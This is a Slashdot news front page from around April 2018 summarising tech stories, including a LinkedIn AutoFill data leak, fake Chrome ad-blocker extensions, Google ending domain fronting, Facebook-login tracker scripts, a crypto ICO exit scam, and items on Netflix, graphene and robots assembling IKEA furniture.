Security

LinkedIn's AutoFill Plugin Could Leak user Data, Secret Fix Failed (techcrunch.com) 5

TechCrunch reports of a flaw in LinkedIn's AutoFill plugin that could have allowed hackers to steal your full name, phone number, email address, location (ZIP code), company, and job title. "Malicious sites have been able to invisibly render the plugin on their entire page so if users who are logged into LinkedIn click anywhere, they'd effectively be hitting a hidden 'AutoFill with LinkedIn' button and giving up their data." From the report: Researcher Jack Cable discovered the issue on April 9th, 2018 and immediately disclosed it to LinkedIn. The company issued a fix on April 10th but didn't inform the public of the issue. Cable quickly informed LinkedIn that its fix, which restricted the use of its AutoFill feature to whitelisted sites who pay LinkedIn to host their ads, still left it open to abuse. If any of those sites have cross-site scripting vulnerabilities, which Cable confirmed some do, hackers can still run AutoFill on their sites by installing an iframe to the vulnerable whitelisted site. He got no response from LinkedIn over the last 9 days so Cable reached out to TechCrunch. A LinkedIn spokesperson issued this statement to TechCrunch: "We immediately prevented unauthorized use of this feature, once we were made aware of the issue. We are now pushing another fix that will address potential additional abuse cases and it will be in place shortly. While we've seen no signs of abuse, we're constantly working to ensure our members' data stays protected. We appreciate the researcher responsibly reporting this and our security team will continue to stay in touch with them. For clarity, LinkedIn AutoFill is not broadly available and only works on whitelisted domains for approved advertisers. It allows visitors to a website to choose to pre-populate a form with information from their LinkedIn profile."
Chrome

Millions of Chrome Users Have Installed Malware Posing as Ad Blockers (vice.com) 21

Kaleigh Rogers, writing for Motherboard: Andrey Meshkov, the cofounder of ad-blocker AdGuard, recently got curious about the number of knock-off ad blocking extensions available for Google's popular browser Chrome. These extensions were deliberately styled to look like legitimate, well-known ad blockers, but Meshkov wondered why they existed at all, so he downloaded one and took a look at the code. "Basically I downloaded it and checked what requests the extension was making," Meshkov told me over the phone. "Some strange requests caught my attention."

Meshkov discovered that the AdRemover extension for Chrome -- which had over 10 million users -- had code hidden inside an image that was loaded from the remote command server, giving the extension creator the ability to change its functions without updating. This alone is against Google's policy, and after Meshkov wrote about a few examples on AdGuard's blog, many of which had millions of downloads, Chrome removed the extensions from the store. I reached out to Google, and a spokesperson confirmed that these extensions had been removed.

Government

FDA Wants Medical Devices To Have Mandatory Built-In Update Mechanisms (bleepingcomputer.com) 50

Catalin Cimpanu, writing for BleepingComputer: The US Food & Drug Administration plans to ask Congress for more funding and regulatory powers to improve its approach towards medical device safety, including on the cybersecurity front. An FDA document released this week reveals several of the FDA's plans, including the desire to force device makers to include mandatory update systems inside products for the purpose of delivering critical security patches.

In addition, the FDA also plans to force device makers to create a document called "Software Bill of Materials" that will be provided for each medical device and will include software-related details for each product. Hospitals, healthcare units, contractors, or users will be able to consult the medical device's bill of materials and determine how it functions, what software is needed for what feature, and what technologies are used in each device.

Businesses

Netflix Could Start Buying Movie Theaters to Help Films Gain a Boost in Oscar Race, Report Says (indiewire.com) 28

Netflix has made a strong effort to land Oscar nominations since debuting its first original feature, "Beasts of No Nation," in 2015. The next step in the streaming giant's plan to secure film awards could be to buy and own movie theaters. IndieWire: A new report from the Los Angeles Times says Netflix is considering buying theaters in Los Angeles and New York in order to gain a boost during Oscar season. People familiar with the situation say the theaters would be used to give greater exposer to the feature and documentary titles Netflix is hoping to push into the awards race. According to the Times, Netflix executives originally considered purchasing the Los Angeles-based Landmark Theaters, which is co-owned by Mark Cuban. The theaters are well known for attracting awards voters by running first-run features, documentaries, and foreign films during Oscar season. Sources close to Netflix confirm the company has no current plans to buy Landmark properties. Landmark has three Los Angeles locations and 53 theaters overall in the U.S. Sources close to Netflix.
United States

The Higher Your Salary, the More Time Your Employer Will Pay You Not To Work (qz.com) 232

The best-paid workers in the US not only make more money than many of their colleagues, they also tend to get more paid vacation days. An anonymous reader shares a report: An annual survey of of employee benefits conducted by the US government shows that, in 2017, nearly half of the people in the top 25% of earners received at least 10 days of paid vacation. The bottom 25% was not so lucky -- only around a tenth of them received such generous leave. Paid vacation time is often overlooked in measures of pay inequality in the US, because the value of time off does not appear in the household income statistics.
Businesses

Pasta Is Good For You, Say Scientists Funded By Big Pasta (buzzfeed.com) 153

Earlier this month, numerous news outlets reported on a study which concludes that eating pasta is good for health. In fact, the reports claimed, eating pasta could help you lose weight. Except, there is more to the story. BuzzFeed News reports: What those and many other stories failed to note, however, was that three of the scientists behind the study in question had financial conflicts as tangled as a bowl of spaghetti, including ties to the world's largest pasta company, the Barilla Group. Over the last decade or so, with the rise of the Atkins, South Beach, paleo, and ketogenic diets, Big Pasta has battled a societal shift against carbohydrates -- and funded and promoted research suggesting that noodles are good for you.

At least 10 peer-reviewed studies about pasta published since 2008 were either funded directly by Barilla or, like the one published this month, were carried out by scientists who have had financial ties to the company, which reported sales of 3.4 billion euros ($4.2 billion) in 2016. For two years, Barilla has publicized some of these studies, plus others favorable to its product, on its website with taglines like "Eat Smart Be Smart...With Pasta" and "More Evidence Pasta Is Good For You." And the company hired the large public relations firm Edelman to push the latest study's findings to journalists.

Microsoft

Microsoft Has Run Out of Windows Phone Stock (venturebeat.com) 54

Even if you really wanted to buy a Windows phone, Microsoft has run out of Windows Phone devices to sell to you. From a report: I've been watching the number of Windows Phone options on the Microsoft Store website dwindle for over two years now. I was honestly expecting them to disappear completely more than six months ago. It's 2018, and there are still two remaining phones. Last night, they both flipped over to "out of stock." The HP Elite x3 with dock, normally $799 but on sale for $299, and the Alcatel Idol 4S, normally $299 but on sale for $99.99, are officially out of stock. The third option for $169, the Alcatel Idol 4S with VR Goggles, is of course also out of stock.
Google

Turn Right at the Burger King: Google Maps Begins Using Landmarks To Help With Guidance (techcrunch.com) 111

Most navigation apps give you instructions based on streets or distance. But it's arguably in contrast to how people usually provide directions -- some usually point to landmarks that are easier to spot. Google sees some merit in that. The idea is that Google Maps is highlighting some landmarks and other points of interest (fast food restaurants) to help with guidance. TechCrunch reports that some users are already seeing this on Google Maps. And maybe to Google, this opens door for some business opportunities as well. Only time will tell.
Businesses

Marissa Mayer is Back (bloomberg.com) 75

Former Yahoo Chief Executive Officer Marissa Mayer is starting a technology business incubator, Lumi Labs, with longtime colleague Enrique Munoz Torres, she revealed in an interview with The New York Times. Bloomberg: The venture will focus on consumer media and artificial intelligence, according to the company's website, which is set against a backdrop of snow-covered peaks. Lumi means snow in Finnish, Mayer told the New York Times, which reported the news earlier Wednesday. The next project for Mayer, who was an early employee at Google and worked there until leaving to run Yahoo in 2012, had been a matter of considerable speculation in Silicon Valley. She left Yahoo, once a leading search engine and web destination, after it was sold to Verizon Communications last year.
The Internet

4.9% of Websites Use Flash, Down From 28.5% in 2011 (bleepingcomputer.com) 93

Web makers continue to ditch the infamous Flash for other safer, improved technologies. In 2011, more than 28.5 percent of websites used Flash in their code, a figure technology survey site W3Techs estimates to have dropped to 4.9 percent today. BleepingComputer: The number confirms Flash's decline, and a reason why Adobe has decided to retire the technology at the end of 2020. A decline from 28.5 percent to 4.9 percent doesn't look that bad, but we're talking about all Internet sites, not just a small portion of Top 10,000 or Top 1 Million sites. Taking into account the sheer number of abandoned sites on today's Internet, the decline is quite considerable, and W3Techs' findings confirm similar statistics put out by a Google security engineer in February.
Businesses

Finland Is Killing Its Basic Income Experiment (businessinsider.com) 397

tomhath shares a report: Since the beginning of last year, 2000 Finns are getting money from the government each month -- and they are not expected to do anything in return. The participants, aged 25-58, are all unemployed, and were selected at random by Kela, Finland's social-security institution. Instead of unemployment benefits, the participants now receive $690 per month, tax free. Should they find a job during the two-year trial, they still get to keep the money. While the project is praised internationally for being at the cutting edge of social welfare, back in Finland, decision makers are quietly pulling the brakes, making a U-turn that is taking the project in a whole new direction. "Right now, the government is making changes that are taking the system further away from a basic income," Kela researcher Miska Simanainen told the Swedish daily Svenska Dagbladet.
Technology

'Increasingly, People in Silicon Valley Are Losing Touch With Reality' (500ish.com) 349

Longtime commentator MG Siegler writes: You can see it in the tweets. You can hear it at tech conferences. Hell, you can hear it at most cafes in San Francisco on any given day. People -- really smart people -- saying some of the most vacuous things. Words that if they were able to take a step outside of their own heads and hear, they'd be embarrassed by. Or, at least, these are stances, thoughts, and ideas that these people should be embarrassed by. But they're clearly not because they keep saying them. This isn't only about Facebook -- far from it. That's just the most high profile and timely example of a company suffering from some of this. And in that case, it's really more in their responses to the Cambridge Analytica situation, rather than the situation itself (which is another matter, though undoubtedly related). They don't know the right things to say because they don't know what to say, period. Because they've slipped out of touch.

But again, I feel like this is increasingly everywhere I look around tech. It's an industry filled with some of the most brilliant people in the world, which makes it all the more disappointing. I won't name names but also because I don't have to. I'd wager everyone reading this will have clear and obvious examples of what I'm talking about in their own circles -- even if only in their own virtual circles. This is everywhere. I don't know the cause of this. Perhaps we can blame part of it on Trump, even if only indirectly (a man who has gotten ahead in life by saying asinine things). If I had to guess, I'd say the root is an increasing sense of entitlement as the tech industry has grown in stature to become the most important from a fiscal perspective and arguably from a cultural perspective as well.

EU

Facebook To Put 1.5 Billion Users Out of Reach of New EU Privacy Law (reuters.com) 84

An anonymous reader quotes a report from Facebook: If a new European law restricting what companies can do with people's online data went into effect tomorrow, almost 1.9 billion Facebook users around the world would be protected by it. The online social network is making changes that ensure the number will be much smaller. Facebook members outside the United States and Canada, whether they know it or not, are currently governed by terms of service agreed with the company's international headquarters in Ireland. Next month, Facebook is planning to make that the case for only European users, meaning 1.5 billion members in Africa, Asia, Australia and Latin America will not fall under the European Union's General Data Protection Regulation (GDPR), which takes effect on May 25. That removes a huge potential liability for Facebook, as the new EU law allows for fines of up to 4 percent of global annual revenue for infractions, which in Facebook's case could mean billions of dollars.
Businesses

Jeff Bezos Reveals That Amazon Has Over 100 Million Prime Subscribers (theverge.com) 106

Amazon CEO Jeff Bezos revealed today that the company has over 100 million Prime members, "marking the first time in the 13-year history of Amazon offering its Prime membership that the company has ever revealed its number of subscribers," reports The Verge. From the report: According to Bezos, Amazon Prime also saw its best year ever in 2017, with the company shipping over five billion products with Prime and signing up more new members than in any previous year. Also revealed today, Whole Foods Market will discontinue its rewards program on May 2 and fold it into Amazon Prime. "Stay tuned for additional announcements for Amazon Prime members," reads the Whole Foods FAQ page focused on digital coupons, rewards and online accounts. "Any account benefits, including membership and/or unused rewards, will not roll into any future programs."
Robotics

Scientists Create Robots That Can Assemble IKEA Furniture For You (sciencemag.org) 120

sciencehabit shares a report from Science Magazine: Although artificial intelligence systems may be able to beat humans at board games, we still have the upper hand when it comes to complicated manual tasks. But now, scientists have created robots that can do something even most humans struggle with: assemble an IKEA chair. Putting together a chair requires a combination of complex movements that, in turn, depends on such skills as vision, limb coordination, and the ability to control force. Until now, that was too much to ask of even a sophisticated robot. But researchers have finally broken the dexterity barrier by combining commercially available hardware, including 3D cameras and force sensors, to build two chair-building bots. To construct their IKEA masterpiece, the robots first took pictures to identify each part of the chair. An algorithm planned the motions the robots needed to manipulate the objects without causing any collisions; two robotic arms then performed those actions in concert. Feedback from force sensors also helped: When the robot needed to insert a pin into a hole, for example, it would slide the pin over the surface until it felt a change in force. The robots were able to put together the chair in a little over 20 minutes, which includes the 11 minutes and 21 seconds of planning time and 8 minutes and 55 seconds of actual assembly. The findings have been reported today in Science Robotics.
Transportation

Autonomous Boats Will Be On the Market Sooner Than Self-Driving Cars (vice.com) 129

An anonymous reader quotes a report from Motherboard: In the autonomous revolution that is underway, nearly every transportation machine will eventually be self-driving. For cars, it's likely going to take decades before we see them operating freely, outside of test conditions. Some unmanned watercraft, on the other hand, may be at sea commercially before 2020. That's partly because automating all ships could generate a ridiculous amount of revenue. According to the United Nations, 90 percent of the world's trade is carried by sea and 10.3 billion tons of products were shipped in 2016. According to NOAA's National Ocean Service, ships transported $1.5 trillion worth of cargo through U.S. ports in 2016. The world's 325 or so deep-sea shipping companies have a combined revenue of $10 billion.

Startups and major firms like Rolls Royce are now looking to automate the seas and help maritime companies ease navigation, save fuel, improve safety, increase tonnage, and make more money. As it turns out, autonomous systems for boats aren't supremely different than those of cars, beyond a few key factors -- for instance, water is always moving while roads are not, and ships need at least a couple miles to redirect. Buffalo Automation, a startup in upstate New York that began at the University at Buffalo, just raised $900,000 to help commercialize its AutoMate system -- essentially a collection of sensors and cameras to help boats operate semi-autonomously. CEO Thiru Vikram said the company is working with three pilot partners, and intends to target cargo ships and recreational vessels first. Autonomous ships are an area of particular interest for the International Maritime Organization (IMO), which sets the standards for international waters. It launched a regulatory scoping exercise last year to analyze the impact of autonomous boats. By the time it wraps in 2020, market demand may make it so that we already have semi-autonomous and unmanned vessels at sea.

Science

MIT Discovers Way To Mass-Produce Graphene In Large Sheets (inhabitat.com) 57

New submitter Paige.Bennett writes: Up till now, graphene has been produced in small batches in labs. But MIT just found a way to mass-produce graphene in large sheets using a process that rolls out five centimeters of graphene each minute. The longest span so far was nearly four hours, which produced about 10 meters of graphene. According to MIT, here's how their conveyor belt system works: "The first spool unfurls a long strip of copper foil, less than one centimeter wide. When it enters the furnace, the foil is fed through first one tube and then another, in a 'split-zone' design. While the foil rolls through the first tube, it heats up to a certain ideal temperature, at which point it is ready to roll through the second tube, where the scientists pump in a specified ratio of methane and hydrogen gas, which are deposited onto the heated foil to produce graphene." The work has been published in the journal Materials and Interfaces.
Bitcoin

German ICO Savedroid Pulls Exit Scam After Raising $50 Million (techcrunch.com) 174

German company Savedroid has pulled a classic exit scam after raising $50 million in ICO and direct funding. The site is currently displaying a South Park meme with the caption "Aannnd it's gone." The founder, Dr. Yassin Hankir, has posted a tweet thanking investors and saying "Over and out." TechCrunch reports: A reverse image search found Hankir's photo on this page for Founder Institute, and he has pitched his product at multiple events, including this one in German. Savedroid was originally supposed to use AI to manage user investments and promised a crypto-backed credit card, a claim that CCN notes is popular with scam ICOs. It ran for a number of months and was clearly well-managed as the group was able to open an office and appear at multiple events.
Censorship

Google Is Shuttering Domain Fronting, Creating a Big Problem For Anti-Censorship Tools (theverge.com) 54

"The Google App Engine is discontinuing a practice called domain fronting, which lets services use Google's network to get around state-level internet blocks," reports The Verge. While the move makes sense from a cybersecurity perspective as domain fronting is widely used by malware to evade network-based detection, it will likely frustrate app developers who use it to get around internet censorship. From the report: First spotted by Tor developers on April 13th, the change has been rolling out across Google services and threatens to disrupt services for a number of anti-censorship tools, including Signal, GreatFire.org and Psiphon's VPN services. Reached by The Verge, Google said the changes were the result of a long-planned network update. "Domain fronting has never been a supported feature at Google," a company representative said, "but until recently it worked because of a quirk of our software stack. We're constantly evolving our network, and as part of a planned software update, domain fronting no longer works. We don't have any plans to offer it as a feature."

Domain-fronting allowed developers to use Google as a proxy, forwarding traffic to their own servers through a Google.com domain. That was particularly important for evading state-level censorship, which might try to block all the traffic sent to a given service. As long as the service was using domain-fronting, all the in-country data requests would appear as if they were headed for Google.com, with encryption preventing censors from digging any deeper.
We do not yet know exactly why and when Google is shutting down the practice, but will update this post once we learn more.
Facebook

'Login With Facebook' Data Hijacked By JavaScript Trackers (techcrunch.com) 83

An anonymous reader quotes a report from TechCrunch: Facebook confirms to TechCrunch that it's investigating a security research report that shows Facebook user data can be grabbed by third-party JavaScript trackers embedded on websites using Login With Facebook. The exploit lets these trackers gather a user's data including name, email address, age range, gender, locale, and profile photo depending on what users originally provided to the website. It's unclear what these trackers do with the data, but many of their parent companies including Tealium, AudienceStream, Lytics, and ProPS sell publisher monetization services based on collected user data. The abusive scripts were found on 434 of the top 1 million websites including freelancer site Fiverr.com, camera seller B&H Photo And Video, and cloud database provider MongoDB. That's according to Steven Englehardt and his colleagues at Freedom To Tinker, which is hosted by Princeton's Center For Information Technology Policy.

Slashdot Top Deals